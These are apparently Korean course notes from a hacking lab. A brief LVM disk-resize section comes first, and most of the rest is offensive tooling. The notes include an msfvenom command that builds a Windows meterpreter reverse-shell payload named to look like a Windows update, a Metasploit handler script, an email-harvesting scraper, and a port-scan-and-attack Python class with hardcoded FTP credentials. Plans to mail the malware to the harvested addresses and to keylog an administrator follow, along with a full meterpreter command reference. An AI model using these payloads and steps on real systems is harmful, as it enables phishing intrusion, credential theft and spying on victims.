디스크 용량 늘리는 방법
물리적인 디스크를 추가해주고
fdisk -l
fdisk /dev/sdc
mkfs.ext4 /dev/sdc1
vgs 로 여유공간 확인
pvcreate /dev/sdc1
vgextend /dev/ubuntu-vg /dev/sdc1
lvextend -L +50G /dev/ubuntu-vg/ubuntu-lv
resize2fs /dev/ubuntu-vg/ubuntu-lv
df -h
미션
악성코드를 만들고 관리자 PC로 침투시켜라
해커는 web2.st.kr에 저장된 이메일을 수집후 자동으로 담당자에게 메을 전송
패킷과 로그를 분석하여 악성코드 침투 흔적을 찾아라
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=7777 -b "\x00" -f exe -o /home/kali/windows_update_20250120001.exe
정규표현식
정규표현식은 문자, 기호, 그리고 메타문자들을 사용하여 특정 조건을 만족하는 문자열을 찾거나, 교체하거나, 추출하는 작업을 합니다.
예를 들어, 이메일 주소, 전화번호, 날짜 형식 등을 검증하거나, 특정 패턴에 맞는 텍스트를 추출할 수 있습니다.
Attack.py 만들기
class Attack:
def __init__(self,target):
print("attack start")
self.target=target
print(target)
def http(self)
print("attack http")
print(self.target)
클래스 = 변수 + 함수
클래스를 만들고 init을 만들어서 생성자를 만든다, 초기화
url로 정보를 주고 그 정보를 init으로 넘긴다
init은 target으로 정보를 받고 self.target으로 정의한다
클래스 메소드는 일반 함수와 같은 방법으로 정의하되 첫번째 인자는 반드시 'self' 여야 합니다.
아래에서 self를 사용하여 self.target을 사용가능하다
import re
import requests
response
dir(response)
ex) : response.text
http요청
response = requests.get(url)
if response.status_code == 200:
soup = BeautifulSoup(response.text, 'html.parser')
이메일 주소 패턴
email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2.}'
emails = re.findall(email_pattern, soup.text)
중복 제거 및 출력
unique_emails = set(emails)
for email in unique_emails:
print(email)
else:
print(f"Failed to access {url}, status code: {response.status_code}")
로그분석
elastic - kibana - packetbeat
user_agent.original : python-requests
*브라우저가 아닌 python이 요청을 한다
미션2
스캔후에 열려있는 포트별로 자동으로 공격하는 공격 코드 만들기
1. 스캔을 한다
2. 포트를 찾는다
3. 80이면 http 공격을 한다
로그인 공격
파일 업로드 공격
SQL 인젝션 공격
XSS 공격
4. 22이면 ssh 공격을 한다
5. 21이면 ftp 공격을 한다
def scan 함수를 생성하고 ports 리스트에 있는 포트와 동일한 포트를 chkPort로 넣는다
for port in chkPorts:
chkPorts에서 port와 같은 숫자가 있으면 조건 실행
if port == 21:
attack1.ftp()
ftp연결하기
def ftp(self):
id="web2"
pw="123456"
ftp = FTP()
print("attack ftp")
print(self.target)
print(ftp)
#print(dir(ftp))
try:
ftp.connect(self.target,21)
ftp.login(id,pw)
print("ok")
except Exception as e:
print({e})
ftp = "web2.st.kr"
attack1 = Attack(ftp)
chkPorts=attack1.scan()
for port in chkPorts:
if port == 21:
attack1.ftp()
elif port == 80:
attack1.http()
attack1.upload()
attack1.brute()
attack1.sql()
attack1.xss()
악성코드 침투 발생
이메일
해커는 다음행동은?
키로거 또는 화면캡처를 통해 관리자의 비밀번호를 찾아내라
악성코드 만들기
수집된 이메일로 자동으로 악성코드 보내기
malware.rc
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.101
set lport 7777
exploit
msfconsole -r /home/kali/malware.rc
meterpreter 명령어
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
ssl_verify Modify the SSL certificate verification setting
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory (alias for lpwd)
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
ldir List local files (alias for lls)
lls List local files
lmkdir Create new directory on local machine
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
